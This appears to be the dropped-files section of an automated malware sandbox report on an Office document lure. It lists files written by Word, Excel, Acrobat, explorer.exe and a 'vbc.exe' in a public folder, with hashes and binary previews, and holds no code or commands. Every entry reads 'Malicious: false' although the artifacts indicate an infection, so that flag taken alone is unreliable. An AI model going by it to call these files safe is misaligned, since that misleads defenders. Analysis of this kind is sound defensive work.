Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRD0001.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Microsoft Word 2007+
Category:	dropped
Size (bytes):	68787
Entropy (8bit):	7.685250547631685
Encrypted:	false
SSDEEP:	1536:0Jsih3PFta9L335kzeMRXBPf0xWIqVDPcp5jxOPlFkYstDCRg:0Jsih7aN3JkKXiDPcp5jwqd
MD5:	BD78ED851642945E0D682DB4D5A449E2
SHA1:	501228357365A15486393E47E2537A593EEA0795
SHA-256:	E3C61269B1947A73BC8F6CFE7D5C2E4F078009332FABE94B0A5964AB7C31F2B1
SHA-512:	16A0F03A16E8290E9E58FFD947FF38C7D4B1A0B3558185F2689700D378108591E9F971800F3E2CA638F60D99E0FE9B28611A0C04DB79BB894AD55E9069A02178
Malicious:	false
Reputation:	unknown
Preview:	PK..........!.H+@............[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J.@.5....Q..8...?d...g..Q[.6.b.)..g...FKYEs.Nh..~.#.(.3....O..{.9.T.. %+pd4...LW.\.j.RRzo.(u...\..(\....-.a...@o{.;..\|..... g..G.%~^.\|.(H.....R"d0..h..B..4.Jp.::W..Y..JPY.q.0...I{BX.....^.8.. .0._.Dt..6...3.u'.m..tq.$.D2n.X...p.....5..U..C...u...Mp.0Vsp.{BV..c....8.c.t.z...=...#^..s..8.DX...Q.....LC.t8.3...>..q......9j.c.......b.P.v..u..n.z.. h.bM"....0.2.Z.i=g.?.......PK..........!.........N..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRD0003.docm (copy)

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Microsoft Word 2007+
Category:	dropped
Size (bytes):	68752
Entropy (8bit):	7.685045018287733
Encrypted:	false
SSDEEP:	1536:0JXq3PFta9L335kzeMRXBPf0xWIqVDPcp5jxOPlFkYstDCRY:0J67aN3JkKXiDPcp5jwqF
MD5:	D60D302905192ABE5092338837270B84
SHA1:	5F58808216CDCB63449A606AFE91D46C2DA9DB98
SHA-256:	BBDAF91CD0CB5CA041A2082CCF27628C999A57C9A8925F564F1CCF096F37572B
SHA-512:	9F29CFA9AEDB516771FB64D72753AA231BA52FF110769355CBF99279EA8012611C1AABE15E3FA441662ABBAD71AD67E8035C0E0C76994A7FED031E33B4EE3083
Malicious:	false
Reputation:	unknown
Preview:	PK..........!.H+@............[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J.@.5....Q..8...?d...g..Q[.6.b.)..g...FKYEs.Nh..~.#.(.3....O..{.9.T.. %+pd4...LW.\.j.RRzo.(u...\..(\....-.a...@o{.;..\|..... g..G.%~^.\|.(H.....R"d0..h..B..4.Jp.::W..Y..JPY.q.0...I{BX.....^.8.. .0._.Dt..6...3.u'.m..tq.$.D2n.X...p.....5..U..C...u...Mp.0Vsp.{BV..c....8.c.t.z...=...#^..s..8.DX...Q.....LC.t8.3...>..q......9j.c.......b.P.v..u..n.z.. h.bM"....0.2.Z.i=g.?.......PK..........!.........N..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRD0004.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Microsoft Word 2007+
Category:	dropped
Size (bytes):	68752
Entropy (8bit):	7.685045018287733
Encrypted:	false
SSDEEP:	1536:0JXq3PFta9L335kzeMRXBPf0xWIqVDPcp5jxOPlFkYstDCRY:0J67aN3JkKXiDPcp5jwqF
MD5:	D60D302905192ABE5092338837270B84
SHA1:	5F58808216CDCB63449A606AFE91D46C2DA9DB98
SHA-256:	BBDAF91CD0CB5CA041A2082CCF27628C999A57C9A8925F564F1CCF096F37572B
SHA-512:	9F29CFA9AEDB516771FB64D72753AA231BA52FF110769355CBF99279EA8012611C1AABE15E3FA441662ABBAD71AD67E8035C0E0C76994A7FED031E33B4EE3083
Malicious:	false
Reputation:	unknown
Preview:	PK..........!.H+@............[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J.@.5....Q..8...?d...g..Q[.6.b.)..g...FKYEs.Nh..~.#.(.3....O..{.9.T.. %+pd4...LW.\.j.RRzo.(u...\..(\....-.a...@o{.;..\|..... g..G.%~^.\|.(H.....R"d0..h..B..4.Jp.::W..Y..JPY.q.0...I{BX.....^.8.. .0._.Dt..6...3.u'.m..tq.$.D2n.X...p.....5..U..C...u...Mp.0Vsp.{BV..c....8.c.t.z...=...#^..s..8.DX...Q.....LC.t8.3...>..q......9j.c.......b.P.v..u..n.z.. h.bM"....0.2.Z.i=g.?.......PK..........!.........N..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRD0005.docm (copy)

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Microsoft Word 2007+
Category:	dropped
Size (bytes):	68752
Entropy (8bit):	7.685045018287733
Encrypted:	false
SSDEEP:	1536:0JXq3PFta9L335kzeMRXBPf0xWIqVDPcp5jxOPlFkYstDCRY:0J67aN3JkKXiDPcp5jwqF
MD5:	D60D302905192ABE5092338837270B84
SHA1:	5F58808216CDCB63449A606AFE91D46C2DA9DB98
SHA-256:	BBDAF91CD0CB5CA041A2082CCF27628C999A57C9A8925F564F1CCF096F37572B
SHA-512:	9F29CFA9AEDB516771FB64D72753AA231BA52FF110769355CBF99279EA8012611C1AABE15E3FA441662ABBAD71AD67E8035C0E0C76994A7FED031E33B4EE3083
Malicious:	false
Reputation:	unknown
Preview:	PK..........!.H+@............[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J.@.5....Q..8...?d...g..Q[.6.b.)..g...FKYEs.Nh..~.#.(.3....O..{.9.T.. %+pd4...LW.\.j.RRzo.(u...\..(\....-.a...@o{.;..\|..... g..G.%~^.\|.(H.....R"d0..h..B..4.Jp.::W..Y..JPY.q.0...I{BX.....^.8.. .0._.Dt..6...3.u'.m..tq.$.D2n.X...p.....5..U..C...u...Mp.0Vsp.{BV..c....8.c.t.z...=...#^..s..8.DX...Q.....LC.t8.3...>..q......9j.c.......b.P.v..u..n.z.. h.bM"....0.2.Z.i=g.?.......PK..........!.........N..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRD0833.docm (copy)

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Microsoft Word 2007+
Category:	dropped
Size (bytes):	68752
Entropy (8bit):	7.685045018287733
Encrypted:	false
SSDEEP:	1536:0JXq3PFta9L335kzeMRXBPf0xWIqVDPcp5jxOPlFkYstDCRY:0J67aN3JkKXiDPcp5jwqF
MD5:	D60D302905192ABE5092338837270B84
SHA1:	5F58808216CDCB63449A606AFE91D46C2DA9DB98
SHA-256:	BBDAF91CD0CB5CA041A2082CCF27628C999A57C9A8925F564F1CCF096F37572B
SHA-512:	9F29CFA9AEDB516771FB64D72753AA231BA52FF110769355CBF99279EA8012611C1AABE15E3FA441662ABBAD71AD67E8035C0E0C76994A7FED031E33B4EE3083
Malicious:	false
Reputation:	unknown
Preview:	PK..........!.H+@............[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J.@.5....Q..8...?d...g..Q[.6.b.)..g...FKYEs.Nh..~.#.(.3....O..{.9.T.. %+pd4...LW.\.j.RRzo.(u...\..(\....-.a...@o{.;..\|..... g..G.%~^.\|.(H.....R"d0..h..B..4.Jp.::W..Y..JPY.q.0...I{BX.....^.8.. .0._.Dt..6...3.u'.m..tq.$.D2n.X...p.....5..U..C...u...Mp.0Vsp.{BV..c....8.c.t.z...=...#^..s..8.DX...Q.....LC.t8.3...>..q......9j.c.......b.P.v..u..n.z.. h.bM"....0.2.Z.i=g.?.......PK..........!.........N..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRD0833.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Microsoft Word 2007+
Category:	dropped
Size (bytes):	68752
Entropy (8bit):	7.685045018287733
Encrypted:	false
SSDEEP:	1536:0JXq3PFta9L335kzeMRXBPf0xWIqVDPcp5jxOPlFkYstDCRY:0J67aN3JkKXiDPcp5jwqF
MD5:	D60D302905192ABE5092338837270B84
SHA1:	5F58808216CDCB63449A606AFE91D46C2DA9DB98
SHA-256:	BBDAF91CD0CB5CA041A2082CCF27628C999A57C9A8925F564F1CCF096F37572B
SHA-512:	9F29CFA9AEDB516771FB64D72753AA231BA52FF110769355CBF99279EA8012611C1AABE15E3FA441662ABBAD71AD67E8035C0E0C76994A7FED031E33B4EE3083
Malicious:	false
Reputation:	unknown
Preview:	PK..........!.H+@............[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J.@.5....Q..8...?d...g..Q[.6.b.)..g...FKYEs.Nh..~.#.(.3....O..{.9.T.. %+pd4...LW.\.j.RRzo.(u...\..(\....-.a...@o{.;..\|..... g..G.%~^.\|.(H.....R"d0..h..B..4.Jp.::W..Y..JPY.q.0...I{BX.....^.8.. .0._.Dt..6...3.u'.m..tq.$.D2n.X...p.....5..U..C...u...Mp.0Vsp.{BV..c....8.c.t.z...=...#^..s..8.DX...Q.....LC.t8.3...>..q......9j.c.......b.P.v..u..n.z.. h.bM"....0.2.Z.i=g.?.......PK..........!.........N..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRD3818.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Microsoft Word 2007+
Category:	dropped
Size (bytes):	68752
Entropy (8bit):	7.685045018287733
Encrypted:	false
SSDEEP:	1536:0JXq3PFta9L335kzeMRXBPf0xWIqVDPcp5jxOPlFkYstDCRY:0J67aN3JkKXiDPcp5jwqF
MD5:	D60D302905192ABE5092338837270B84
SHA1:	5F58808216CDCB63449A606AFE91D46C2DA9DB98
SHA-256:	BBDAF91CD0CB5CA041A2082CCF27628C999A57C9A8925F564F1CCF096F37572B
SHA-512:	9F29CFA9AEDB516771FB64D72753AA231BA52FF110769355CBF99279EA8012611C1AABE15E3FA441662ABBAD71AD67E8035C0E0C76994A7FED031E33B4EE3083
Malicious:	false
Reputation:	unknown
Preview:	PK..........!.H+@............[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J.@.5....Q..8...?d...g..Q[.6.b.)..g...FKYEs.Nh..~.#.(.3....O..{.9.T.. %+pd4...LW.\.j.RRzo.(u...\..(\....-.a...@o{.;..\|..... g..G.%~^.\|.(H.....R"d0..h..B..4.Jp.::W..Y..JPY.q.0...I{BX.....^.8.. .0._.Dt..6...3.u'.m..tq.$.D2n.X...p.....5..U..C...u...Mp.0Vsp.{BV..c....8.c.t.z...=...#^..s..8.DX...Q.....LC.t8.3...>..q......9j.c.......b.P.v..u..n.z.. h.bM"....0.2.Z.i=g.?.......PK..........!.........N..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRL0002.tmp (copy)

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Microsoft Word 2007+
Category:	dropped
Size (bytes):	66142
Entropy (8bit):	7.669317647447264
Encrypted:	false
SSDEEP:	1536:3N3PFta9L335kzeMRXBPf0xWIqVDPcp5jxOPlFkYsurho:3N7aN3JkKXiDPcp5jw5r6
MD5:	E6C470463FA46EC729E27B8258BDEA21
SHA1:	D97E04A116017DF865DBF0045F7E76F9F15EF93C
SHA-256:	B88C408D8F1EBC1C25766B628204C7D64614588036B71123DCCB01238BD6C55E
SHA-512:	2CD186A648AD13EB3CB98E4BEE6CF9EBAB43545F688A7FF76CABFD0D0D0E36344B28A3CE759CCC2ED32F10D30D72E14BA7D91E8A9F5ABA3A98A9EADA94361EBA
Malicious:	false
Reputation:	unknown
Preview:	PK..........!....i....:.......[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T.N.1.....n.L..1....RI..(.:}.-...v.. .F.I{{.....KU%sp^...n.!.hn..eN>..#I\|`Z..h...<..ooz... Z..LC.O.z>..\|f,h...).p.Jj..f%..N.r....A...(...p..k'_.J.<./F..H....=.qP..........8p.n\e............1.ojW`.{.r:) .1..B.ta......v..S.4B....wf....2...O......Ak.[.)....6.3...PU..m.G....)..b}.3!@.h......N.B@..H~..~../.h.v/.AMsV...2..r...7.gM,`.q....i....bl?..>2u....?.......PK..........!.........N......._rels/.rels ...(

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRO0000.doc

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Microsoft Word 2007+
Category:	dropped
Size (bytes):	66142
Entropy (8bit):	7.669317647447264
Encrypted:	false
SSDEEP:	1536:3N3PFta9L335kzeMRXBPf0xWIqVDPcp5jxOPlFkYsurho:3N7aN3JkKXiDPcp5jw5r6
MD5:	E6C470463FA46EC729E27B8258BDEA21
SHA1:	D97E04A116017DF865DBF0045F7E76F9F15EF93C
SHA-256:	B88C408D8F1EBC1C25766B628204C7D64614588036B71123DCCB01238BD6C55E
SHA-512:	2CD186A648AD13EB3CB98E4BEE6CF9EBAB43545F688A7FF76CABFD0D0D0E36344B28A3CE759CCC2ED32F10D30D72E14BA7D91E8A9F5ABA3A98A9EADA94361EBA
Malicious:	false
Reputation:	unknown
Preview:	PK..........!....i....:.......[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T.N.1.....n.L..1....RI..(.:}.-...v.. .F.I{{.....KU%sp^...n.!.hn..eN>..#I\|`Z..h...<..ooz... Z..LC.O.z>..\|f,h...).p.Jj..f%..N.r....A...(...p..k'_.J.<./F..H....=.qP..........8p.n\e............1.ojW`.{.r:) .1..B.ta......v..S.4B....wf....2...O......Ak.[.)....6.3...PU..m.G....)..b}.3!@.h......N.B@..H~..~../.h.v/.AMsV...2..r...7.gM,`.q....i....bl?..>2u....?.......PK..........!.........N......._rels/.rels ...(

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{0A75375F-3CC8-4EA5-9371-2B6C593FF4BA}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Reputation:	unknown
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{5BA40E38-2FD0-4CA7-ACE4-D835302118C9}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1536
Entropy (8bit):	0.11299086186625841
Encrypted:	false
SSDEEP:	3:llYdltn/lLQ+n:A3K+
MD5:	3E63486E4BEB395BEDDF4EADC8EAA7DF
SHA1:	3B1D6276345408B5F320AEE4A73AE71EF79ED78C
SHA-256:	5DAEC42472B3B45BA0D38072709BFEE8956D67AED379B39273758475162DB75F
SHA-512:	321453C0BF34BBFD094BA75B85BC3E15D7FE053F10F2BF3D89B926593DB02DA59970F8D619ACB46378753739C164396DE3A97A970D1A2F07E0441F7D24C073F1
Malicious:	false
Reputation:	unknown
Preview:	../.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\7927.tmp

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 3, database pages 20, cookie 0x15, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.7798653713156546
Encrypted:	false
SSDEEP:	48:L3k+YzHF/8LKBwUf9KfWfkMUEilGc7xBM6vu3f+fmyJqhU:LSe7mlcwilGc7Ha3f+u
MD5:	CD5ACB5FAA79EEB4CDB481C6939EEC15
SHA1:	527F3091889C553B87B6BC0180E903E2931CCCFE
SHA-256:	D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96
SHA-512:	A79C4D7F592A9E8CC983878B02C0B89DECB77D71F9451C0A5AE3F1E898C42081693C350E0BE0BA52342D51D6A3E198E0E87340AC5E268921623B088113A70D5D
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\8806.tmp

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001, file counter 9, database pages 7, 1st free page 7, free pages 2, cookie 0xd, schema 4, UTF-8, version-valid-for 9
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	0.9650411582864293
Encrypted:	false
SSDEEP:	48:T2loMLOpEO5J/KdGU1jX983Gul4kEBrvK5GYWgqRSESXh:inNww9t9wGAE
MD5:	903C35B27A5774A639A90D5332EEF8E0
SHA1:	5A8CE0B6C13D1AF00837AA6CA1AA39000D4EB7CF
SHA-256:	1159B5AE357F89C56FA23C14378FF728251E6BDE6EEA979F528DB11C4030BE74
SHA-512:	076BD35B0D59FFA7A52588332A862814DDF049EE59E27542A2DA10E7A5340758B8C8ED2DEFE78C5B5A89EE54C19A89D49D2B86B49BF5542D76C1D4A378B40277
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................C..........g...N......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\9292.tmp

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 4, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	77824
Entropy (8bit):	1.1340767975888557
Encrypted:	false
SSDEEP:	96:rSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+H:OG8mZMDTJQb3OCaM0f6k81Vumi
MD5:	9A38AC1D3304A8EEFD9C54D4EADCCCD6
SHA1:	56E953B2827B37491BC80E3BFDBBF535F95EDFA7
SHA-256:	67960A6297477E9F2354B384ECFE698BEB2C1FA1F9168BEAC08D2E270CE3558C
SHA-512:	32281388C0DE6AA73FCFF0224450E45AE5FB970F5BA3E72DA1DE4E39F80BFC6FE1E27AAECC6C08165D2BF625DF57F3EE3FC1115BF1F4BA6DDE0EB4F69CD0C77D
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\B22F.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	1536
Entropy (8bit):	1.1464700112623651
Encrypted:	false
SSDEEP:	3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
MD5:	72F5C05B7EA8DD6059BF59F50B22DF33
SHA1:	D5AF52E129E15E3A34772806F6C5FBF132E7408E
SHA-256:	1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
SHA-512:	6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
Malicious:	false
Reputation:	unknown
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF21B771BE28787BB3.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	696320
Entropy (8bit):	7.561095845477482
Encrypted:	false
SSDEEP:	12288:08aFiKXK8e/VcDEKwICIPk66k2gbc+M+uUWHe/AcDEKwICIPo66k9gbc+M+uUWt:aLKx/SDLwBkl0+MXUT/1DLwBkJ7+MXUC
MD5:	F22D11CA6B6238F05000FF97115DC056
SHA1:	979F1B6EB832C2E3EAD55C18C5054E55A9C9D6E3
SHA-256:	15CCAF026B5F768E5AB729709952257075417BD27D8CF2759FABB58102FE0BB0
SHA-512:	E2E0466F8E1F12C7009D558BDD5ACFE10B19C51A80EDE0DEDD6C9C5FB2EA4E6075097C33D6C4BA158946712D2C06536BE6415C71AE6997BA43B30A12AF93A030
Malicious:	false
Reputation:	unknown
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF3CEEAA1D017AD1E9.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	925696
Entropy (8bit):	6.877673881663541
Encrypted:	false
SSDEEP:	24576:LLKE/gDLwBkSR+MXUZ/BDLwBkp0+MXUyLKpLK:LLKWHj+MX8a5+MXvLKpLK
MD5:	9CA6AE31C3AC22D65E81773AE9072040
SHA1:	16AD0A03E091BCC35E6C0E12C5BD225BD428FB08
SHA-256:	E83561BC6D02A7A4AFD3226311CE02AD9B09279940074287F90EFE268B8EFDC4
SHA-512:	161395D91817D981393E4287E99C1D12EFB33F75F9283CD38699AD6039F8A50B824D650AC576A6DBAE0B338F71803C725315AAE701340A1F01D41DFE1ED4E862
Malicious:	false
Reputation:	unknown
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF68D68CF70D380525.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Reputation:	unknown
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_store

Download File

Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
File Type:	data
Category:	dropped
Size (bytes):	10240
Entropy (8bit):	0.6739662216458647
Encrypted:	false
SSDEEP:	12:Ppb0slZp69PO9tauZ7nH2AaYSQ81v0t4TreIBUxFj87+k/R:RbG4WuZfKZ1c+reIAon/R
MD5:	C61F99FE7BEE945FC31B62121BE075CD
SHA1:	083BBD0568633FECB8984002EB4FE8FA08E17DD9
SHA-256:	1E0973F4EDEF345D1EA8E90E447B9801FABDE63A2A1751E63B91A8467E130732
SHA-512:	46D743C564A290EDFF307F8D0EF012BB01ED4AA6D9667E87A53976B8F3E87D78BEBE763121A91BA8FB5B0CF5A8C9FDE313D7FBD144FB929D98D7D39F4C9602C9
Malicious:	false
Reputation:	unknown
Preview:	....+..F..N..F).~]............\.">.. .......p.J..} /o...rLj-...FS..'x.o..%^ .....zr/..3.y.e4...MM.4..x9.f.D..{..(....'p......9...Qn..d..+.....H..M.)..........].....n-.]........n&.*.H`.sz...r.....1B.....e.."...A.....,-....n..$.<....CO..VO..P..'.......<......n....&5s....z..$.{'IM-.o..(#N.-..(H...a&...y.S..`8.(./...1.P.. .....K.3.......I!]G....@N........F.l.T=.0...`"..L....B...B`nI.<.....&F..2J2....1..Rs....h.Zq.`...t..CJ....@.....I.G.e..k..H.....F..G:..6.G.l=.Y......:...C.........?[.ts...=....;.\|...q...@....s................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_storei

Download File

Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
File Type:	data
Category:	dropped
Size (bytes):	24152
Entropy (8bit):	0.7532185028349225
Encrypted:	false
SSDEEP:	48:CMnfnO4FGtsFqN6t8nlztZKR6axR6uiozVb:ZnfO4kWKpZKdxR35
MD5:	520FE964934AF1AB0CEBA2366830D0FA
SHA1:	B90310ACA870261CB619FDFD1E54E1B1A25074FF
SHA-256:	DBD45EEA386D364B30BA189E079BFA05C2C40D9E5E83722C39A171998ED079C1
SHA-512:	A4839A6AB8DB522D9121A590B8C711E8C4F172D9CB71C918860F8048472920F3341B7BA624DFF514BE397809149E4471B2DF981DC81FE77C26B2DDF342A42F8C
Malicious:	false
Reputation:	unknown
Preview:	...W....K.h.E..g..0...!1sm.[t\......A......5_...N{Yf?.w..[.Y..A...a^..(._.=.......:.v.$.....e...F....f.qo.]...B1{.8.%%..,...;.\|..<....g ....l.7.`ny.h.n.y...~Y.../.. .WZ.'......AI.\|.._K}-$.i..<(.7Y...U....T.i.N.'Pt..c.[........<zni.::. 8W.<S...8!.Wh..;T.?.^yf...E?...pQ....i.;>/..^...r.YsncP..@.. .[".^..A.\|.0..$<bC.G........~];..D.\|.v.B.).g.E5.?... .N...}....i.,5..a.Fk.%.u.`..F...;xlw.}.5.Jt..c.5.....v...~)..8b\|..B.]-]jk....PQZ..T}..M.S...88......?.$..]..%V..D.<.5.d...[..Z.....2........%.$E..+sb..........g...>Q[l.}......@=..5L..._....Pi..HY.<[..l...H....9.\=u.v.....S8-&...,5..}t......m...*..R.W.G.NZ....w.....{.iA......G.f.TN.zk..(....q).....n....3..C...d./..........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-966771315-3019405637-367336477-1006\f554348b930ff81505ce47f7c6b7d232_ea860e7a-a87f-4a88-92ef-38f744458171

Download File

Process:	C:\Users\Public\vbc.exe
File Type:	data
Category:	dropped
Size (bytes):	46
Entropy (8bit):	1.0424600748477153
Encrypted:	false
SSDEEP:	3:/lbWwWl:sZ
MD5:	3B7B4F5326139F48EFA0AAE509E2FE58
SHA1:	209A1CE7AF7FF28CCD52AE9C8A89DEE5F2C1D57A
SHA-256:	D47B073BF489AB75A26EBF82ABA0DAB7A484F83F8200AB85EBD57BED472022FC
SHA-512:	C99D99EA71E54629815099464A233E7617E4E118DD5B2A7A32CF41141CB9815DF47B0A40D1A9F89980C307596B53DD63F76DD52CF10EE21F47C635C5F68786B5
Malicious:	false
Reputation:	unknown
Preview:	........................................user.

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\PO-112030087.LNK

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:45:57 2022, mtime=Tue Mar 8 15:45:57 2022, atime=Tue May 16 18:55:22 2023, length=1421824, window=hide
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	4.497692673964643
Encrypted:	false
SSDEEP:	24:82LJ/XT9SUILDaZCSJCebEzDv3q8qA7qJ:88/XTQ2/JCV68lG
MD5:	0F0A64F157ABFF9ADD98783767DC8637
SHA1:	48D74527C05E7843B09EEB67B66AFCC4851A80DC
SHA-256:	B0C4CE1452D30501E99455C864B48ECE3CCB9744F6D6D5AB59356AF818931673
SHA-512:	EDB75CA869B43A70533E9DED1221AB257F03B265D0613DA7A0D04B7990FB010A484E0877E4145B30F52FC604D827DCC06BF670457859922D99C9D5140A429867
Malicious:	false
Reputation:	unknown
